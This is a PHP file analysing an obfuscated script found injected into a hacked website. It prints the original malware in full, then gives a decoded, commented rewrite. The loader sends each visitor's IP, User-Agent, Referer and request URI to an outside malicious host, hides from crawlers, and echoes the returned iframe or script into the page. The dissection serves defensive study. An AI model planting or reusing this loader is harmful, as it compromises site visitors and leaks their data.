<? /* This script was found lying after the <body> tag of a website whose host had been hacked. It is an example of significant obfuscation and is dissected and analyzed below.
The ten-digit numbers used as array names have been changed in case they are uniquely identifiable.
- <? $GLOBALS['_1234567890_']=Array(base64_decode('c3RyX' .'3JlcGxhY2U='),base64_decode('c' .'3RyX3JlcGxh' .'Y2U='),base64_decode('Y3VybF' .'9pb' .'ml' .'0'),base64_decode('Y' .'3VybF' .'9zZXR' .'vcH' .'Q='),base64_decode('Y3V' .'ybF9' .'zZXRvc' .'HQ='),base64_decode('Y3Vy' .'bF9leG' .'Vj'),base64_decode('' .'Y3VybF' .'9jbG9zZQ=='),base64_decode('c' .'3' .'Vic3' .'RyX2NvdW50'),base64_decode('c3Vic' .'3R' .'yX' .'2NvdW' .'50'),base64_decode('' .'c3V' .'ic3' .'Ry' .'X2' .'NvdW50'),base64_decode('c3' .'Vic3RyX2Nv' .'dW50'),base64_decode('Z2' .'V0aG9' .'zd' .'G' .'J5' .'YWRkc' .'g=='),base64_decode('Z' .'Xhwb' .'G9kZQ=='),base64_decode('ZXhwbG' .'9' .'kZQ=='),base64_decode('' .'dHJpbQ' .'=='),base64_decode('c' .'3Vic3R' .'yX2NvdW50'),base64_decode('' .'c3Vic3RyX2N' .'vdW' .'5' .'0'),base64_decode('c3' .'Vic' .'3' .'Ry' .'X2N' .'vdW5' .'0'),base64_decode('c3Vic3Ry' .'X' .'2N' .'vdW50'),base64_decode('' .'c' .'3Vi' .'c3R' .'yX2NvdW50'),base64_decode('c3Vic' .'3RyX2Nvd' .'W50'),base64_decode('c' .'3V' .'i' .'c3' .'R' .'yX2N' .'vdW50'),base64_decode('c3Vic3RyX2NvdW50'),base64_decode('' .'c3' .'Vi' .'c' .'3' .'RyX' .'2Nvd' .'W50'),base64_decode('c' .'3' .'V' .'ic3RyX2' .'NvdW50'),base64_decode('c3V' .'ic' .'3Ry' .'X2N' .'vdW50'),base64_decode('c3Vic3RyX2' .'NvdW50'),base64_decode('c3Vic3Ry' .'X2NvdW' .'5' .'0'),base64_decode('c3Vic3R' .'y' .'X2NvdW50'),base64_decode('c3V' .'ic3' .'RyX2' .'NvdW5' .'0'),base64_decode('c3Vi' .'c' .'3RyX' .'2N' .'vdW50'),base64_decode('c3' .'Vic3RyX' .'2' .'NvdW50')); ?><? 
function _0987654321($i){$a=Array('IA==','Kw==','Jg==','LS11dQ==','aHR0cDovL25lYXJkYW1uZ29vZC5pbmZvL2FydGljbGVzL2ltYWdlcy9pZnIucGhwP2tleT0=','Jmhvc3Q9','JmFnZW50PQ==','JnJpcD0=','JnJlZj0=','aWZyYW1l','c2NyaXB0','bm90aGluZ2c=','bm90aGluZ2c=','bm90Zm91bmRk','bm90Zm91bmRk','','SFRUUF9VU0VSX0FHRU5U','UkVNT1RFX0FERFI=','SFRUUF9SRUZFUkVS','SFRUUF9IT1NU','UkVRVUVTVF9VUkk=','','UVVFUllfU1RSSU5H','Lg==','Lg==','NjY=','MjQ5','MjE5','NzQ=','MTI1','NjQ=','MjMz','MTk0','OA==','Z29vZ2xl','R29vZ2xl','cGlkZXI=','UElERVI=','cmF3bGVy','UkFXTEVS','Ym90','Qm90','Qk9U','YXNrLmNvbQ==','TGludXg=','bGludXg=','dHJhbnNsYXRlLmdvb2dsZS5jb20=','TVNJRQ==','RmlyZWZveA==','SFRUUF9IT1NU','bm90Zm91bmRk','bm90aGluZ2c=');return base64_decode($a[$i]);} ?><? function l__0($_0,$_1,$_2,$_3,$_4){$_2=$GLOBALS['_1234567890_'][0](_0987654321(0),_0987654321(1),$_2);$_4=$GLOBALS['_1234567890_'][1](_0987654321(2),_0987654321(3),$_4);$_5=$GLOBALS['_1234567890_'][2](_0987654321(4) .$_0 ._0987654321(5) .$_1 ._0987654321(6) .$_2 ._0987654321(7) .$_3 ._0987654321(8) .$_4);$GLOBALS['_1234567890_'][3]($_5,CURLOPT_HEADER,round(0));$GLOBALS['_1234567890_'][4]($_5,CURLOPT_RETURNTRANSFER,round(0+0.5+0.5));$_6=$GLOBALS['_1234567890_'][5]($_5);$GLOBALS['_1234567890_'][6]($_5);if($GLOBALS['_1234567890_'][7]($_6,_0987654321(9))||$GLOBALS['_1234567890_'][8]($_6,_0987654321(10)))return $_6;elseif($GLOBALS['_1234567890_'][9]($_6,_0987654321(11)))return _0987654321(12);elseif($GLOBALS['_1234567890_'][10]($_6,_0987654321(13)))return _0987654321(14);else return _0987654321(15);}$_2=$_SERVER[_0987654321(16)];$_3=$_SERVER[_0987654321(17)];$_7=$GLOBALS['_1234567890_'][11]($_3);$_4=$_SERVER[_0987654321(18)];$_1=$_SERVER[_0987654321(19)];$_0=$_SERVER[_0987654321(20)];if($_8== _0987654321(21))$_8=$_SERVER[_0987654321(22)];$_1=$GLOBALS['_1234567890_'][12](_0987654321(23),$_1);$_9=$_3;$_3=$GLOBALS['_1234567890_'][13](_0987654321(24),$_3);$_2=$GLOBALS['_1234567890_'][14]($_2);if(($_3[round(0)]== 
_0987654321(25)&&($_3[round(0+0.2+0.2+0.2+0.2+0.2)]== _0987654321(26)||$_3[round(0+0.2+0.2+0.2+0.2+0.2)]== _0987654321(27)))||($_3[round(0)]== _0987654321(28)&&$_3[round(0+1)]== _0987654321(29))||($_3[round(0)]== _0987654321(30)&&$_3[round(0+1)]== _0987654321(31)&&($_3[round(0+2)]<=round(0+47.75+47.75+47.75+47.75)&&$_3[round(0+0.4+0.4+0.4+0.4+0.4)]>=round(0+32+32+32+32+32)))||($_3[round(0)]== _0987654321(32)&&$_3[round(0+0.2+0.2+0.2+0.2+0.2)]== _0987654321(33))||($GLOBALS['_1234567890_'][15]($_7,_0987654321(34))>round(0))||($GLOBALS['_1234567890_'][16]($_7,_0987654321(35))>round(0))||($GLOBALS['_1234567890_'][17]($_2,_0987654321(36)))||($GLOBALS['_1234567890_'][18]($_2,_0987654321(37)))||($GLOBALS['_1234567890_'][19]($_2,_0987654321(38)))||($GLOBALS['_1234567890_'][20]($_2,_0987654321(39)))||($GLOBALS['_1234567890_'][21]($_2,_0987654321(40)))||($GLOBALS['_1234567890_'][22]($_2,_0987654321(41)))||($GLOBALS['_1234567890_'][23]($_2,_0987654321(42)))||($GLOBALS['_1234567890_'][24]($_2,_0987654321(43)))||($GLOBALS['_1234567890_'][25]($_2,_0987654321(44)))||($GLOBALS['_1234567890_'][26]($_2,_0987654321(45)))||($GLOBALS['_1234567890_'][27]($_2,_0987654321(46)))){}else{if(($GLOBALS['_1234567890_'][28]($_2,_0987654321(47))>round(0))||($GLOBALS['_1234567890_'][29]($_2,_0987654321(48))>round(0))){$_10=l__0($_0,$_SERVER[_0987654321(49)],$_2,$_9,$_4);if($GLOBALS['_1234567890_'][30]($_10,_0987654321(50))){}if($GLOBALS['_1234567890_'][31]($_10,_0987654321(51))){}else if($_10)echo $_10;}} ?>
*/ ?>
<?
// Part 1: The function array
//
// Levels of obfuscation:
// 1. Function names are base64-encoded:
//      $string = base64_encode("substr_count");
//      return $string; // returns "c3Vic3RyX2NvdW50"
// 2. The resulting strings are broken apart at random positions and glued
//    back together with the concatenation operator:
//      echo 'str'.'ing'; // "string"
//      i.e. 'c3Vic'.'3R'.'yX'.'2NvdW'.'50'
// 3. The encoded names are wrapped in base64_decode() and stored in a global
//    array, so the rest of the script can call a function by array index
//    instead of by name:
//      $GLOBALS['_1234567890_'][8]              returns "substr_count"
//      $GLOBALS['_1234567890_'][8]($s, 'bot')   is substr_count($s, 'bot')
//
// Review notes:
// - The 32 entries decode to only nine distinct functions: str_replace,
//   curl_init, curl_setopt, curl_exec, curl_close, substr_count,
//   gethostbyaddr, explode and trim. The many duplicates ([7]-[10] and
//   [15]-[31] are all "substr_count") give each call site its own index,
//   presumably so that no two call sites look alike.
// - From a defender's point of view, a `$GLOBALS[...] = Array(base64_decode(...), ...)`
//   block that contains nothing but function names is a strong indicator that
//   the file was injected, and it is easy to grep for.
$GLOBALS['_1234567890_']=Array(
    base64_decode('c3RyX' .'3JlcGxhY2U='),                              // [0]  => "str_replace"
    base64_decode('c' .'3RyX3JlcGxh' .'Y2U='),                          // [1]  => "str_replace"
    base64_decode('Y3VybF' .'9pb' .'ml' .'0'),                          // [2]  => "curl_init"
    base64_decode('Y' .'3VybF' .'9zZXR' .'vcH' .'Q='),                  // [3]  => "curl_setopt"
    base64_decode('Y3V' .'ybF9' .'zZXRvc' .'HQ='),                      // [4]  => "curl_setopt"
    base64_decode('Y3Vy' .'bF9leG' .'Vj'),                              // [5]  => "curl_exec"
    base64_decode('' .'Y3VybF' .'9jbG9zZQ=='),                          // [6]  => "curl_close"
    base64_decode('c' .'3' .'Vic3' .'RyX2NvdW50'),                      // [7]  => "substr_count"
    base64_decode('c3Vic' .'3R' .'yX' .'2NvdW' .'50'),                  // [8]  => "substr_count"
    base64_decode('' .'c3V' .'ic3' .'Ry' .'X2' .'NvdW50'),              // [9]  => "substr_count"
    base64_decode('c3' .'Vic3RyX2Nv' .'dW50'),                          // [10] => "substr_count"
    base64_decode('Z2' .'V0aG9' .'zd' .'G' .'J5' .'YWRkc' .'g=='),      // [11] => "gethostbyaddr"
    base64_decode('Z' .'Xhwb' .'G9kZQ=='),                              // [12] => "explode"
    base64_decode('ZXhwbG' .'9' .'kZQ=='),                              // [13] => "explode"
    base64_decode('' .'dHJpbQ' .'=='),                                  // [14] => "trim"
    base64_decode('c' .'3Vic3R' .'yX2NvdW50'),                          // [15] => "substr_count"
    base64_decode('' .'c3Vic3RyX2N' .'vdW' .'5' .'0'),                  // [16] => "substr_count"
    base64_decode('c3' .'Vic' .'3' .'Ry' .'X2N' .'vdW5' .'0'),          // [17] => "substr_count"
    base64_decode('c3Vic3Ry' .'X' .'2N' .'vdW50'),                      // [18] => "substr_count"
    base64_decode('' .'c' .'3Vi' .'c3R' .'yX2NvdW50'),                  // [19] => "substr_count"
    base64_decode('c3Vic' .'3RyX2Nvd' .'W50'),                          // [20] => "substr_count"
    base64_decode('c' .'3V' .'i' .'c3' .'R' .'yX2N' .'vdW50'),          // [21] => "substr_count"
    base64_decode('c3Vic3RyX2NvdW50'),                                  // [22] => "substr_count"
    base64_decode('' .'c3' .'Vi' .'c' .'3' .'RyX' .'2Nvd' .'W50'),      // [23] => "substr_count"
    base64_decode('c' .'3' .'V' .'ic3RyX2' .'NvdW50'),                  // [24] => "substr_count"
    base64_decode('c3V' .'ic' .'3Ry' .'X2N' .'vdW50'),                  // [25] => "substr_count"
    base64_decode('c3Vic3RyX2' .'NvdW50'),                              // [26] => "substr_count"
    base64_decode('c3Vic3Ry' .'X2NvdW' .'5' .'0'),                      // [27] => "substr_count"
    base64_decode('c3Vic3R' .'y' .'X2NvdW50'),                          // [28] => "substr_count"
    base64_decode('c3V' .'ic3' .'RyX2' .'NvdW5' .'0'),                  // [29] => "substr_count"
    base64_decode('c3Vi' .'c' .'3RyX' .'2N' .'vdW50'),                  // [30] => "substr_count"
    base64_decode('c3' .'Vic3RyX' .'2' .'NvdW50')                       // [31] => "substr_count"
);
?>
<?
// Part 2: The string array
//
// Levels of obfuscation:
// 1. The strings are base64-encoded in the same way as the function names above.
// 2. The resulting strings are placed into an array inside a function, and each
//    call _0987654321($i) decodes entry $i on demand, e.g. _0987654321(34)
//    returns "google".
//
// Review notes:
// - [16]-[22] are the $_SERVER keys the script reads; [4]-[8] are the pieces of
//   the URL that l__0() builds from them, so the remote host receives the
//   visitor's request URI, Host header, User-Agent, IP address and Referer.
// - [25]-[33] are IP-octet values and [34]-[48] are crawler / browser
//   User-Agent markers; both groups are used by the cloaking check at the
//   bottom of the script.
// - [11]-[14] and [50]-[51] are the marker strings ("nothingg", "notfoundd")
//   the remote host uses to say it has no payload for this visitor.
//
// @param int $i Index into the encoded-string table.
// @return string The decoded string.
function _0987654321($i)
{
    $a=Array(
        'IA==',                                                                 // [0]  => " "
        'Kw==',                                                                 // [1]  => "+"
        'Jg==',                                                                 // [2]  => "&"
        'LS11dQ==',                                                             // [3]  => "--uu"
        // Note: Please do not visit this website. Their code is malicious.
        'aHR0cDovL25lYXJkYW1uZ29vZC5pbmZvL2FydGljbGVzL2ltYWdlcy9pZnIucGhwP2tleT0=', // [4]  => "http://neardamngood.info/articles/images/ifr.php?key="
        'Jmhvc3Q9',                                                             // [5]  => "&host="
        'JmFnZW50PQ==',                                                         // [6]  => "&agent="
        'JnJpcD0=',                                                             // [7]  => "&rip="
        'JnJlZj0=',                                                             // [8]  => "&ref="
        'aWZyYW1l',                                                             // [9]  => "iframe"
        'c2NyaXB0',                                                             // [10] => "script"
        'bm90aGluZ2c=',                                                         // [11] => "nothingg"
        'bm90aGluZ2c=',                                                         // [12] => "nothingg"
        'bm90Zm91bmRk',                                                         // [13] => "notfoundd"
        'bm90Zm91bmRk',                                                         // [14] => "notfoundd"
        '',                                                                     // [15] => ""
        'SFRUUF9VU0VSX0FHRU5U',                                                 // [16] => "HTTP_USER_AGENT"
        'UkVNT1RFX0FERFI=',                                                     // [17] => "REMOTE_ADDR"
        'SFRUUF9SRUZFUkVS',                                                     // [18] => "HTTP_REFERER"
        'SFRUUF9IT1NU',                                                         // [19] => "HTTP_HOST"
        'UkVRVUVTVF9VUkk=',                                                     // [20] => "REQUEST_URI"
        '',                                                                     // [21] => ""
        'UVVFUllfU1RSSU5H',                                                     // [22] => "QUERY_STRING"
        'Lg==',                                                                 // [23] => "."
        'Lg==',                                                                 // [24] => "."
        'NjY=',                                                                 // [25] => "66"
        'MjQ5',                                                                 // [26] => "249"
        'MjE5',                                                                 // [27] => "219"
        'NzQ=',                                                                 // [28] => "74"
        'MTI1',                                                                 // [29] => "125"
        'NjQ=',                                                                 // [30] => "64"
        'MjMz',                                                                 // [31] => "233"
        'MTk0',                                                                 // [32] => "194"
        'OA==',                                                                 // [33] => "8"
        'Z29vZ2xl',                                                             // [34] => "google"
        'R29vZ2xl',                                                             // [35] => "Google"
        'cGlkZXI=',                                                             // [36] => "pider"   (matches "spider"/"Spider")
        'UElERVI=',                                                             // [37] => "PIDER"
        'cmF3bGVy',                                                             // [38] => "rawler"  (matches "crawler"/"Crawler")
        'UkFXTEVS',                                                             // [39] => "RAWLER"
        'Ym90',                                                                 // [40] => "bot"
        'Qm90',                                                                 // [41] => "Bot"
        'Qk9U',                                                                 // [42] => "BOT"
        'YXNrLmNvbQ==',                                                         // [43] => "ask.com"
        'TGludXg=',                                                             // [44] => "Linux"
        'bGludXg=',                                                             // [45] => "linux"
        'dHJhbnNsYXRlLmdvb2dsZS5jb20=',                                         // [46] => "translate.google.com"
        'TVNJRQ==',                                                             // [47] => "MSIE"
        'RmlyZWZveA==',                                                         // [48] => "Firefox"
        'SFRUUF9IT1NU',                                                         // [49] => "HTTP_HOST"
        'bm90Zm91bmRk',                                                         // [50] => "notfoundd"
        'bm90aGluZ2c='                                                          // [51] => "nothingg"
    );
    // Unlike the function array, the string table is wrapped in a function and
    // each string is decoded only when requested, i.e. _0987654321(34)
    // returns "google".
    return base64_decode($a[$i]);
}
?>
<?
// Part 3: The primary function
//
// l__0() queries an external site for an <iframe> or <script> to insert into
// the current page. It does this with cURL after building a query string that
// hands a number of the visitor's request variables to that external site.
//
// 1. Because the functions and strings are looked up in arrays with random
//    names, the original function is a mess of seemingly nonsensical
//    variables. For readability, calls into both arrays have been replaced
//    below with their decoded result, e.g.
//      $_2=$GLOBALS['_1234567890_'][0](_0987654321(0),_0987654321(1),$_2);
//    becomes
//      $_2=str_replace(' ','+',$_2);
// 2. Throughout the original, small integers are produced by a creative use of
//    round(), e.g. round(0+0.2+0.2+0.2+0.2+0.2) is 1 and round(0+0.5+0.5) is 1.
//
// Parameters (names as in the original; values come from the call site below):
//   $_0  $_SERVER['REQUEST_URI']
//   $_1  $_SERVER['HTTP_HOST']
//   $_2  $_SERVER['HTTP_USER_AGENT'] (trimmed by the caller)
//   $_3  $_SERVER['REMOTE_ADDR']
//   $_4  $_SERVER['HTTP_REFERER']
// Returns the remote response body if it mentions "iframe" or "script", one of
// the marker strings "nothingg" / "notfoundd" if the response contains them,
// or "" otherwise.
//
// Review note: the whole response body is returned as-is and later echoed into
// the page, so the content served to the visitor is decided entirely by the
// remote host at request time.
function l__0($_0,$_1,$_2,$_3,$_4)
{
    // $_2 is the User-Agent; spaces are replaced with '+' so the value
    // survives being placed in a URL query string.
    $_2 = str_replace(' ', '+', $_2);
    // $_4 is the Referer; a literal '&' would start a new query parameter,
    // so it is replaced with the marker '--uu'.
    $_4 = str_replace('&', '--uu', $_4);
    // Build the request. Only the agent and referer are rewritten; the other
    // values are appended raw.
    $_5 = curl_init(
        // Note: Please do not visit this website. Their code is malicious.
        'http://neardamngood.info/articles/images/ifr.php?key='
        . $_0 // $_SERVER['REQUEST_URI']
        . '&host='
        . $_1 // $_SERVER['HTTP_HOST']
        . '&agent='
        . $_2 // $_SERVER['HTTP_USER_AGENT'] (cleaned)
        . '&rip='
        . $_3 // $_SERVER['REMOTE_ADDR']
        . '&ref='
        . $_4 // $_SERVER['HTTP_REFERER'] (cleaned)
    );
    curl_setopt($_5,CURLOPT_HEADER,0);          // don't include the response headers in the output
    curl_setopt($_5,CURLOPT_RETURNTRANSFER,1);  // return the body as a string instead of printing it
    // $_6 now holds whatever the remote site printed in response to the
    // visitor's request variables.
    $_6=curl_exec($_5);
    curl_close($_5);
    // Classify the output
    if(
        substr_count($_6, 'iframe') || substr_count($_6, 'script')
    )
        // The response includes "iframe" or "script": return it verbatim.
        return $_6;
    elseif(
        substr_count($_6, 'nothingg')
    )
        // The response contains the marker: return only the marker.
        return 'nothingg';
    elseif(
        // NOTE(review): the trailing ';' on the next line is a transcription
        // error in this rewrite (it turns the condition into a syntax error);
        // the original obfuscated script has no semicolon here.
        substr_count($_6, 'notfoundd');
    )
        // The response contains the marker: return only the marker.
        return 'notfoundd';
    // Otherwise, return nothing.
    else return '';
}
// Part 4: Gathering the input and deciding whether to fire
//
// Review notes:
// - This is a cloaking check: visitors whose IP address, reverse-DNS name or
//   User-Agent looks like a crawler, and anyone whose User-Agent mentions
//   Linux, get an untouched page; only User-Agents containing "MSIE" or
//   "Firefox" trigger the remote request. A scan of the site with a
//   non-browser User-Agent, or from a Linux browser, would therefore not
//   show the injected content.
// - Observable side effects per qualifying request: one reverse-DNS lookup
//   (gethostbyaddr) and one outbound HTTP request to the host named in l__0().
$_2 = $_SERVER['HTTP_USER_AGENT'];
$_3 = $_SERVER['REMOTE_ADDR'];
$_7 = gethostbyaddr($_3); // reverse-DNS name of the visitor; only used for the
                          // "google"/"Google" check below
$_4 = $_SERVER['HTTP_REFERER'];
$_1 = $_SERVER['HTTP_HOST'];
$_0 = $_SERVER['REQUEST_URI'];
// $_8 is not defined before this line and is never read afterwards (reading it
// here only raises an undefined-variable notice); the statement has no effect.
if($_8 == '') $_8 = $_SERVER['QUERY_STRING'];
// Split the Host header on "."; the result is never used (the call to l__0()
// below passes $_SERVER['HTTP_HOST'] directly).
$_1 = explode('.', $_1);
// Keep an unsplit copy of the visitor's IP address for l__0(), then split the
// IP into its four octets for the range checks.
$_9 = $_3;
$_3 = explode('.',$_3);
$_2 = trim($_2);
// Cloaking check: if any of the following applies, do nothing.
// IP address ranges are written as [0].[1].[2].[3]
if(
    ($_3[0]== 66 &&
    ($_3[1]== 249 ||                  // 66.249.*.* or
    $_3[1]== 219))||                  // 66.219.*.* or
    ($_3[0]== 74 && $_3[1]== 125) ||  // 74.125.*.* or
    // 64.233.160-191.*  -- both bounds apply to the third octet; the original
    // reads ($_3[2] <= 191 && $_3[2] >= 160) and the extra ')' on the next
    // line is a transcription error in this rewrite.
    ($_3[0]== 64 && $_3[1]== 233 && ($_3[2] <= 191) && $_3[2]>=160)) ||
    ($_3[0]== 194 &&$_3[1]== 8) ||    // 194.8.*.* or
    // Reverse-DNS name verification
    (substr_count($_7,'google')>0) || // host name contains "google"
    (substr_count($_7,'Google')>0) || // or "Google"
    // User-Agent verification: crawler markers, Linux, Google Translate
    (substr_count($_2,'pider')) ||    // "spider" / "Spider"
    (substr_count($_2,'PIDER')) ||
    (substr_count($_2,'rawler')) ||   // "crawler" / "Crawler"
    (substr_count($_2,'RAWLER')) ||
    (substr_count($_2,'bot')) ||
    (substr_count($_2,'Bot')) ||
    (substr_count($_2,'BOT')) ||
    (substr_count($_2,'ask.com')) ||
    (substr_count($_2,'Linux')) ||
    (substr_count($_2,'linux')) ||
    (substr_count($_2,'translate.google.com'))
)
{
    // The visitor is in one of the IP ranges above, resolves to a "google"
    // host name, or presents a crawler / Linux User-Agent: do nothing.
}
else{
    // Only Internet Explorer and Firefox User-Agents proceed.
    if(
        (substr_count($_2, 'MSIE')>0) ||
        (substr_count($_2, 'Firefox')>0)
    )
    {
        // Send the visitor's request data and pull the iframe or script from
        // the remote host.
        //   $_0 = $_SERVER['REQUEST_URI']
        //   $_2 = $_SERVER['HTTP_USER_AGENT'] (trimmed)
        //   $_9 = $_SERVER['REMOTE_ADDR']
        //   $_4 = $_SERVER['HTTP_REFERER']
        $_10=l__0($_0,$_SERVER['HTTP_HOST'],$_2,$_9,$_4);
        if(substr_count($_10,'notfoundd'))
        {
            // Empty branch. NOTE(review): because this `if` has no `else`, a
            // "notfoundd" result falls through to the next `if`, fails its
            // 'nothingg' test and is echoed by the `else if` below -- so the
            // literal text "notfoundd" can end up in the served page.
        }
        if(substr_count($_10,'nothingg'))
        {
            // "nothingg": the remote host had nothing for this visitor; emit nothing.
        }
        else if($_10) echo $_10; // otherwise write the remote content into the page, unescaped
    }
}
?>